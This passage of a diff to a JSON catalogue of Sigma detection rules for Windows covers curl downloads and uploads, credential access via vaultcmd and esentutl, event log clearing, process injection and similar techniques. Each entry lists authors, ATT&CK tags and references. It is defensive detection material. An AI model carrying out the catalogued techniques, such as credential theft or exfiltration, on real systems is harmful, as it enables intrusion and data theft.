"https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt", - "https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", - "value": "Suspicious Curl Usage on Windows" - }, - { - "description": "Detects a suspicious curl process start the adds a file to a web request", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/03", - "falsepositive": [ - "Scripts created by developers and admins" - ], - "filename": "proc_creation_win_susp_curl_fileupload.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/d1r4c/status/1279042657508081664", - "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://curl.se/docs/manpage.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" - ] - }, - "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", - "value": "Suspicious Curl File Upload" - }, - { - "description": "Adversaries can use curl to download payloads remotely and execute them. 
Curl is included by default in Windows 10 build 17063 and later.", - "meta": { - "author": "Sreeman, Nasreddine Bencherchali", - "creation_date": "2020/01/13", - "falsepositive": [ - "Administrative scripts (installers)" - ], - "filename": "proc_creation_win_susp_curl_start_combo.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_start_combo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "value": "Curl Start Combination" + "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "value": "Suspicious Where Execution" }, { "description": "Detects a suspicious curl process start on Windows with set useragent options", 
@@ -49180,3748 +42545,131 @@ "value": "Suspicious Curl Change User Agents" }, { - "description": "Detects suspicious process injection using ZOHO's dctask64.exe", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/01/28", - "falsepositive": [ - "Unknown yet" - ], - "filename": "proc_creation_win_susp_dctask64_proc_inject.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", - "https://twitter.com/gN3mes1s/status/1222095371175911424", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dctask64_proc_inject.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ] - }, - "uuid": "6345b048-8441-43a7-9bed-541133633d7a", - "value": "ZOHO Dctask64 Process Injection" - }, - { - "description": "Detects suspicious command line to remove and 'exe' or 'dll'", + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", "meta": { "author": "frack113", - "creation_date": "2021/12/02", + "creation_date": "2022/04/08", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_del.yml", + "filename": "proc_creation_win_susp_vaultcmd.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_del.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" ], "tags": [ 
- "attack.defense_evasion", - "attack.t1070.004" + "attack.credential_access", + "attack.t1555.004" ] }, - "uuid": "204b17ae-4007-471b-917b-b917b315c5db", - "value": "Suspicious Del in CommandLine" + "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "value": "Windows Credential Manager Access via VaultCmd" }, { - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/03", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Legitmate usage of the utility by administrators to query the event log" ], - "filename": "proc_creation_win_susp_desktopimgdownldr.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", - "https://twitter.com/SBousseaden/status/1278977301745741825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_desktopimgdownldr.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "value": "Suspicious Desktopimgdownldr Command" - }, - { - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/11", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_devinit_lolbin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/mrd0x/status/1460815932402679809", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devinit_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "90d50722-0483-4065-8e35-57efaadd354d", - "value": "DevInit Lolbin Download" - }, - { - "description": "The Devtoolslauncher.exe executes other binary", - "meta": { - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", - "creation_date": "2019/10/12", - "falsepositive": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" - ], - "filename": "proc_creation_win_susp_devtoolslauncher.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/", - "https://twitter.com/_felamos/status/1179811992841797632", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "value": "Devtoolslauncher.exe Executes Specified Binary" - }, - { - "description": "Detects usage of the \"dir\" command that's part of windows batch/cmd to collect information about directories", - "meta": { - "author": "frack113", - "creation_date": "2021/12/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_dir.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dir.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1217" - ] - }, - "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", - "value": "Suspicious DIR Execution" - }, - { - 
"description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "meta": { - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" - ], - "filename": "proc_creation_win_susp_direct_asep_reg_keys_modification.yml", + "filename": "proc_creation_win_wevtutil_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_direct_asep_reg_keys_modification.yml" + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml" ], "tags": [ + "attack.discovery" + ] + }, + "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "value": "Wevtutil Recon" + }, + { + "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "meta": { + "author": "MSTIC, FPT.EagleEye", + "creation_date": "2021/06/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_sourgrum.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", + "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", + 
"https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" + ], + "tags": [ + "attack.t1546", + "attack.t1546.015", "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation" ] }, - "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", - "value": "Direct Autorun Keys Modification" + "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", + "value": "SOURGUM Actor Behaviours" }, { - "description": "Detects command that is used to disable or delete Windows eventlog via logman Windows utility", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/11", - "falsepositive": [ - "Legitimate deactivation by administrative staff", - "Installer tools that disable services, e.g. before log collection agent installation" - ], - "filename": "proc_creation_win_susp_disable_eventlog.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1359039665232306183?s=21", - "https://ss64.com/nt/logman.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" - ] - }, - "uuid": "cd1f961e-0b96-436b-b7c6-38da4583ec00", - "value": "Disable or Delete Windows Eventlog" - }, - { - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/06/19", - "falsepositive": [ - "Unknown, maybe some security software installer disables these features temporarily" - ], - "filename": "proc_creation_win_susp_disable_ie_features.yml", - "level": "high", - "logsource.category": 
"process_creation", - "logsource.product": "windows", - "refs": [ - "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_ie_features.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "value": "Disabled IE Security Features" - }, - { - "description": "Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/01/21", - "falsepositive": [ - "Legitimate deinstallation by administrative staff" - ], - "filename": "proc_creation_win_susp_disable_raccine.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/Raccine", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_disable_raccine.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", - "value": "Raccine Uninstall" - }, - { - "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", - "meta": { - "author": "Ivan Dyachkov, oscd.community", - "creation_date": "2020/10/07", - "falsepositive": [ - "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
- ], - "filename": "proc_creation_win_susp_diskshadow.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/", - "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_diskshadow.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ] - }, - "uuid": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", - "value": "Execution via Diskshadow.exe" - }, - { - "description": "Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.", - "meta": { - "author": "Furkan Caliskan (@caliskanfurkan_)", - "creation_date": "2020/07/04", - "falsepositive": [ - "Legitimate admin usage" - ], - "filename": "proc_creation_win_susp_ditsnap.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2020/06/21/snatch-ransomware/", - "https://github.com/yosqueoy/ditsnap", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ditsnap.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.003" - ] - }, - "uuid": "d3b70aad-097e-409c-9df2-450f80dc476b", - "value": "DIT Snapshot Viewer Use" - }, - { - "description": "Detects a \"dllhost\" spawning with no commandline arguments which is a very rare thing to happen and could indicate process injection activity or malware mimicking similar system processes", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/27", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_dllhost_no_cli.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://redcanary.com/blog/child-processes/", - "https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dllhost_no_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ] - }, - "uuid": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "value": "Dllhost Process With No CommandLine" - }, - { - "description": "Execute C# code located in the consoleapp folder", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2019/10/26", - "falsepositive": [ - "Legitimate use of dnx.exe by legitimate user" - ], - "filename": "proc_creation_win_susp_dnx.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/", - "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dnx.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1027.004" - ] - }, - "uuid": "81ebd28b-9607-4478-bf06-974ed9d53ed7", - "value": "Application Whitelisting Bypass via Dnx.exe" - }, - { - "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", - "meta": { - "author": "Florian Roth (rule), @blu3_team (idea)", - "creation_date": "2019/06/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_double_extension.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html", - "https://twitter.com/blackorbird/status/1140519090961825792", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1566.001" - ] - }, - "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", - "value": "Suspicious Double Extension" - }, - { - "description": "Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2021/12/27", - "falsepositive": [ - "Scripts or tools that download attachments from these domains (OneNote, Outlook 365)" - ], - "filename": "proc_creation_win_susp_download_office_domain.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/an0n_r0/status/1474698356635193346?s=12", - "https://twitter.com/mrd0x/status/1475085452784844803?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_download_office_domain.yml" - ], - "tags": "No established tags" - }, - "uuid": "00d49ed5-4491-4271-a8db-650a4ef6f8c1", - "value": "Suspicious Download from Office Domain" - }, - { - "description": "Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_dtrace_kernel_dump.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1474899714290208777?s=12", - "https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/dtrace", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_dtrace_kernel_dump.yml" - ], - "tags": "No established tags" - }, 
- "uuid": "7124aebe-4cd7-4ccb-8df0-6d6b93c96795", - "value": "Suspicious Kernel Dump Using Dtrace" - }, - { - "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/21", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_electron_app_children.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://taggart-tech.com/quasar-electron/", - "https://github.com/mttaggart/quasar", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", - "value": "Suspicious Electron Application Child Processes" - }, - { - "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", - "meta": { - "author": "FPT.EagleEye", - "creation_date": "2020/12/25", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_emotet_rundll32_execution.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://paste.cryptolaemus.com/emotet/2020/12/22/emotet-malware-IoCs_12-22-20.html", - "https://cyber.wtf/2021/11/15/guess-whos-back/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emotet_rundll32_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ] - }, - "uuid": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", - "value": "Emotet RunDLL32 Process Creation" - }, - { - "description": "Conti recommendation to its affiliates to use esentutl to access NTDS dumped file. 
Trickbot also uses this utilities to get MSEdge info via its module pwgrab.", - "meta": { - "author": "sam0x90", - "creation_date": "2021/08/06", - "falsepositive": [ - "To be determined" - ], - "filename": "proc_creation_win_susp_esentutl_params.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816", - "https://attack.mitre.org/software/S0404/", - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.003" - ] - }, - "uuid": "7df1713a-1a5b-4a4b-a071-dc83b144a101", - "value": "Esentutl Gather Credentials" - }, - { - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "meta": { - "author": "Ecco, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/09/26", - "falsepositive": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" - ], - "filename": "proc_creation_win_susp_eventlog_clear.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ] - }, - "uuid": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "value": "Suspicious Eventlog Clear 
or Configuration Using Wevtutil" - }, - { - "description": "Detects a suspicious execution from an uncommon folder", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2019/01/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_execution_path.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", - "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", - "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", - "value": "Execution from Suspicious Folder" - }, - { - "description": "Detects a suspicious program execution in a web service root folder (filter out false positives)", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/16", - "falsepositive": [ - "Various applications", - "Tools that include ping or nslookup command invocations" - ], - "filename": "proc_creation_win_susp_execution_path_webserver.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path_webserver.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1505.003" - ] - }, - "uuid": "35efb964-e6a5-47ad-bbcd-19661854018d", - "value": "Execution in Webserver Root Folder" - }, - { - "description": "Attackers can use 
explorer.exe for evading defense mechanisms", - "meta": { - "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", - "creation_date": "2020/10/05", - "falsepositive": [ - "Legitimate explorer.exe run from cmd.exe" - ], - "filename": "proc_creation_win_susp_explorer.yml", - "level": "low", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "9eb271b9-24ae-4cd4-9465-19cfc1047f3e", - "value": "Proxy Execution Via Explorer.exe" - }, - { - "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", - "meta": { - "author": "Florian Roth, Nasreddine Bencherchali, @gott_cyber", - "creation_date": "2019/06/29", - "falsepositive": [ - "Unknown how many legitimate software products use that method" - ], - "filename": "proc_creation_win_susp_explorer_break_proctree.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", - "https://twitter.com/bohops/status/1276357235954909188?s=12", - "https://twitter.com/nas_bench/status/1535322450858233858", - "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ] - }, - "uuid": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", - "value": "Explorer Process Tree Break" - }, - { - "description": 
"Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/02/23", - "falsepositive": [ - "Domain Controller User Logon", - "Unknown how many legitimate software products use that method" - ], - "filename": "proc_creation_win_susp_explorer_nouaccheck.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ORCA6665/status/1496478087244095491", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_nouaccheck.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1548.002" - ] - }, - "uuid": "534f2ef7-e8a2-4433-816d-c91bccde289b", - "value": "Explorer NOUACCHECK Flag" - }, - { - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "meta": { - "author": "Markus Neis, Sander Wiebing", - "creation_date": "2018/11/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_file_characteristics.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/muddywater/88059/", - "https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_characteristics.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.006" - ] - }, - "uuid": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", - "value": "Suspicious File Characteristics Due to Missing Fields" - }, - { - "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", - "meta": { - "author": "Victor Sergeev, oscd.community", - "creation_date": 
"2020/10/09", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/GfxDownloadWrapper/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_file_download_via_gfxdownloadwrapper.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "eee00933-a761-4cd0-be70-c42fe91731e7", - "value": "GfxDownloadWrapper.exe Downloads File from Suspicious URL" - }, - { - "description": "Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).", - "meta": { - "author": "frack113", - "creation_date": "2021/12/16", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_findstr_385201.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_385201.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ] - }, - "uuid": "37db85d1-b089-490a-a59a-c7b6f984f480", - "value": "Suspicious Findstr 385201 Execution" - }, - { - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "meta": { - "author": "Trent Liffick", - "creation_date": "2020/05/01", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_findstr_lnk.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://www.bleepingcomputer.com/news/security/hhsgov-open-redirect-used-by-coronavirus-phishing-to-spread-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_findstr_lnk.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" - ] - }, - "uuid": "33339be3-148b-4e16-af56-ad16ec6c7e7b", - "value": "Findstr Launching .lnk File" - }, - { - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "meta": { - "author": "Florian Roth, omkar72, oscd.community", - "creation_date": "2021/02/24", - "falsepositive": [ - "Admin activity (unclear what they do nowadays with finger.exe)" - ], - "filename": "proc_creation_win_susp_finger_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", - "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", - "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", - 